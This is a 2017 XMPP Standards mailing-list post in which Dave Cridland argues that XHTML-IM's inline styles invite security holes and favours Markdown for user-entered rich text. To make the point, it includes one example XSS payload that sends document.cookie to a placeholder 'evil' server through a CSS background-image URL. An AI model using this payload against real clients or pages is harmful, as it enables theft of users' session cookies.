On 12 October 2017 at 09:27, Goffi <go...@goffi.org> wrote: > Hi David, > > Le jeudi 12 octobre 2017, 10:09:41 CEST Dave Cridland a écrit : > >> There are dozens of quite reasonable Markdown libraries in Javascript. >> These will handle, suppress, and otherwise deal with embedded HTML. >> Every other IM system I can find just does Markdown of some flavour. >> XHTML is, pretty much, dead at this point anyway. > > There are dozen of flavours of Mardown, not always compatibles, it's not a > syntax adapted for XML, and it's really limited (no table/color by default for > instance). Markdown is not standardized, which make it quite a bad choice to > be used in a standard protocol. And what if in 5 year an other syntax is > trendy? >
I think there may be an argument for XHTML-IM in things other than IM, yes. Which is ironic considering the name. But out of curiosity, do you allow inline style in your uses of XHTML-IM? So can something like the following work: <p style='background-image: url(&dquot;javascript:new Image().src='http://my.evil.server/?cookie=' + encodeURI(document.cookie);&dquot;);'>Hello</p> A solid CSP will block this for newer browsers, of course, and background-image is a SHOULD NOT in XEP-0071 as well. But I'd be surprised if many implementations are filtering CSS at the property level. I'm depressingly well aware of the failure of Markdown to standardize on a single dialect, but I'm also well aware that the state of the art in HTML-based applications is to use simple Markdown rather than HTML for any user entered rich text, because of the very high risk of security problems. > I don't really see the point of changing to a syntax just because it's popular > now when XHTML-IM is perfectly adapted to XML, standardized, and working well > (and Markdown can be trivially converted to XHTML-IM, so it's already usable > at the moment). > > And again, we are going for years of incompatibilities by changing it now. Honestly, I think we're trading years of insecurity for a little incompatibility. Dave. _______________________________________________ Standards mailing list Info: https://mail.jabber.org/mailman/listinfo/standards Unsubscribe: standards-unsubscr...@xmpp.org _______________________________________________
